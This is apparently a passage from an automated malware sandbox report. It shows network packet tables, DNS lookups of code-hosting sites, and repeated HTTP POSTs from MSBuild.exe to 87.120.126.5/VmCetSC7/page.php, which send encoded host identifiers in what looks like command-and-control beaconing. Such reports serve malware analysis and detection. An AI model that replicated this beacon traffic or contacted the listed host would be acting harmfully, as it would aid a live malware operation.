                                                                                                                    Jan 3, 2025 23:22:15.909085035 CET805001287.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:16.258179903 CET5001280192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:16.263139963 CET805001287.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:16.502264023 CET805001287.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:16.554980040 CET5001280192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:16.806046963 CET805001287.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:16.843585014 CET805001287.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:16.843656063 CET5001280192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:26.368132114 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:26.368134975 CET5001280192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:26.372999907 CET805001387.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:26.373110056 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:26.373121023 CET805001287.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:26.373194933 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:26.373456001 CET5001280192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:26.377939939 CET805001387.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:26.728207111 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:26.733031988 CET805001387.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:26.964682102 CET805001387.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:27.023736000 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:27.098423004 CET805001387.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:27.148736000 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:43.102416992 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:43.102899075 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:43.107800007 CET805001487.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:43.107816935 CET805001387.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:43.107870102 CET5001380192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:43.107884884 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:43.107999086 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:43.112716913 CET805001487.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:43.461318016 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:43.466185093 CET805001487.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:43.714971066 CET805001487.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:43.758127928 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:44.018284082 CET805001487.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:44.074217081 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:56.977363110 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:56.977366924 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:56.982260942 CET805001587.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:56.982343912 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:56.982426882 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:56.982553005 CET805001487.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:56.982682943 CET5001480192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:56.987128019 CET805001587.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:57.336338043 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:57.341209888 CET805001587.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:57.591558933 CET805001587.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:57.633141994 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:22:57.720423937 CET805001587.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:22:57.773758888 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.039983988 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.039983988 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.044840097 CET805001687.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:09.045002937 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.045027971 CET805001587.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:09.045110941 CET5001580192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.045113087 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.049815893 CET805001687.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:09.398834944 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.403644085 CET805001687.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:09.654040098 CET805001687.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:09.695641994 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:09.782094955 CET805001687.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:09.836282015 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:25.915277004 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:25.915757895 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:25.920841932 CET805001787.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:25.920902014 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:25.920959949 CET805001687.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:25.920999050 CET5001680192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:25.921148062 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:25.925848007 CET805001787.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:26.273931980 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:26.278732061 CET805001787.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:26.562422037 CET805001787.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:26.680282116 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:26.993798018 CET805001787.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:27.086373091 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:33.524249077 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:33.524784088 CET5001880192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:33.529391050 CET805001787.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:33.529485941 CET5001780192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:33.529561996 CET805001887.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:33.529633999 CET5001880192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:33.529773951 CET5001880192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:33.534488916 CET805001887.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:33.889066935 CET5001880192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:33.895338058 CET805001887.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:34.166520119 CET805001887.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:34.290971994 CET805001887.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:34.296550989 CET5001880192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:49.559495926 CET5001880192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:49.563713074 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:49.564562082 CET805001887.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:49.564611912 CET5001880192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:49.568516016 CET805001987.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:49.568579912 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:49.572565079 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:49.577424049 CET805001987.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:49.932035923 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:23:49.936871052 CET805001987.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:50.671550989 CET805001987.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:23:50.789457083 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.806238890 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.806752920 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.811356068 CET805001987.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:00.811563969 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:00.811568975 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.811629057 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.811736107 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.816463947 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.164522886 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:01.169389009 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.422911882 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.508184910 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:01.554022074 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.711321115 CET5002080192.168.2.487.120.126.5
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 3, 2025 23:19:58.668076038 CET5963553192.168.2.41.1.1.1
                                                                                                                    Jan 3, 2025 23:19:58.674969912 CET53596351.1.1.1192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:00.309508085 CET5239053192.168.2.41.1.1.1
                                                                                                                    Jan 3, 2025 23:20:00.316374063 CET53523901.1.1.1192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:10.442970991 CET5280253192.168.2.41.1.1.1
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET53528021.1.1.1192.168.2.4
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Jan 3, 2025 23:19:58.668076038 CET192.168.2.41.1.1.10x41e5Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:00.309508085 CET192.168.2.41.1.1.10xa99aStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.442970991 CET192.168.2.41.1.1.10x9d12Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Jan 3, 2025 23:19:58.674969912 CET1.1.1.1192.168.2.40x41e5No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:19:58.674969912 CET1.1.1.1192.168.2.40x41e5No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:19:58.674969912 CET1.1.1.1192.168.2.40x41e5No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:00.316374063 CET1.1.1.1192.168.2.40xa99aNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:00.316374063 CET1.1.1.1192.168.2.40xa99aNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:00.316374063 CET1.1.1.1192.168.2.40xa99aNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:00.316374063 CET1.1.1.1192.168.2.40xa99aNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com52.216.138.83A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com54.231.168.241A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com52.216.24.140A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com52.217.228.137A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com52.217.114.161A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com52.217.114.41A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com3.5.11.213A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:10.462954998 CET1.1.1.1192.168.2.40x9d12No error (0)s3-w.us-east-1.amazonaws.com16.15.177.90A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:12.718255997 CET1.1.1.1192.168.2.40xc094No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:12.718255997 CET1.1.1.1192.168.2.40xc094No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:13.257496119 CET1.1.1.1192.168.2.40x9c26No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:13.257496119 CET1.1.1.1192.168.2.40x9c26No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:26.347604036 CET1.1.1.1192.168.2.40xb301No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:26.347604036 CET1.1.1.1192.168.2.40xb301No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:54.102775097 CET1.1.1.1192.168.2.40x67a4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 3, 2025 23:20:54.102775097 CET1.1.1.1192.168.2.40x67a4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                    • bitbucket.org
                                                                                                                    • raw.githubusercontent.com
                                                                                                                    • bbuseruploads.s3.amazonaws.com
                                                                                                                    • 87.120.126.5
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.44982287.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:21:08.150535107 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:21:08.521208048 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:21:08.745385885 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:21:08.874341011 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:21:08 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.44986387.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:21:14.442074060 CET194OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Jan 3, 2025 23:21:14.789393902 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:21:15.044193029 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:21:15.180600882 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:21:14 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.44991787.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:21:22.498044968 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:21:22.857340097 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:21:23.424710035 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:21:23.558291912 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:21:23 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.45001087.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:21:37.168098927 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:21:37.523775101 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:21:37.758785009 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:21:37.890394926 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:21:37 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.45001187.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:21:54.467031002 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:21:54.821209908 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:21:55.080929041 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:21:55.210479021 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:21:55 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.45001287.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:22:15.904340029 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:22:16.258179903 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:22:16.502264023 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:22:16.806046963 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:22:16 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0
